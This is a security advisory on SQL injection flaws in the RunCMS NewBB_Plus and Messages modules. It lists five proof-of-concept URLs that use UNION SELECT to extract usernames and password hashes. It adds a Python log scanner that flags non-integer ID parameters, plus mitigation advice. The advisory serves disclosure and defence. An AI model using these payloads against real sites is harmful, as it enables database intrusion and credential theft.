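RunCMS NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities


Date added:
2005-08-24

System ID:
WAVDB-00636
BUGTRAQ: 14631

Affected versions:
RunCMS 1.1-1.2

Program description:

RunCMS is a content management system written in PHP.

Vulnerability analysis:

Multiple SQL injection vulnerabilities exist in RunCMS. An attacker who successfully exploits them can execute arbitrary SQL commands in the database.

The cause is that user input is not properly validated.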



Exploit:

http://www.example.com/runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/

http://www.example.com/runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2'&topic_id=2&viewmode=flat&order=0

http://www.example.com/runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2&topic_id=2&viewmode=flat&order=0

http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_pn

http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_sent_pn



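Solution:
Vendor patch:
RunCMS
------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: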
http://www.runcms.org/public/modules/news/
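
Until a patch is available, web server access logs can be checked for non-numeric values in the ID parameters of the affected scripts. The following is an added example, not part of the original advisory or of RunCMS; it assumes combined-format access logs and that the listed parameters are meant to carry plain non-negative integers, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Affected scripts and the ID parameters seen in the advisory's request URLs.
# Assumption: these parameters are meant to carry plain non-negative integers.
AFFECTED = {
    "/modules/newbb_plus/newtopic.php": {"forum"},
    "/modules/newbb_plus/edit.php": {"forum", "post_id", "topic_id"},
    "/modules/newbb_plus/reply.php": {"forum", "post_id", "topic_id"},
    "/modules/messages/print.php": {"msg_id"},
}
INT_RE = re.compile(r"\d{1,10}")
# Request part of a combined-format access log line: "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(param, decoded_value)] for ID parameters that are not integers."""
    parts = urlsplit(target)
    for suffix, params in AFFECTED.items():
        if parts.path.endswith(suffix):
            break
    else:
        return []  # request does not touch an affected script
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in params and not INT_RE.fullmatch(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Yield (line_number, hits) for each log line with a non-integer ID value."""
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            hits = suspicious_params(m.group(1))
            if hits:
                yield n, hits

SAMPLE_LOG = [  # constructed log lines using documentation IP addresses
    '192.0.2.10 - - [24/Aug/2005:10:00:01 +0000] "GET /runcms/modules/newbb_plus/reply.php?forum=3&post_id=2&topic_id=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Aug/2005:10:00:07 +0000] "GET /runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201&post_id=2%27&topic_id=2 HTTP/1.1" 200 812',
    '192.0.2.44 - - [24/Aug/2005:10:00:09 +0000] "GET /runcms/modules/messages/print.php?msg_id=7&op=print_pn HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {hits}")
```

The same integer-only rule can be enforced in front of the application (for example in a reverse proxy or WAF rule) to reject such requests rather than only report them.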


Source:
<*Source: James Bercegay (security@gulftech.org)
         NT (NT@IHSTeam.com)
   Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112439215217671&w=2
 *>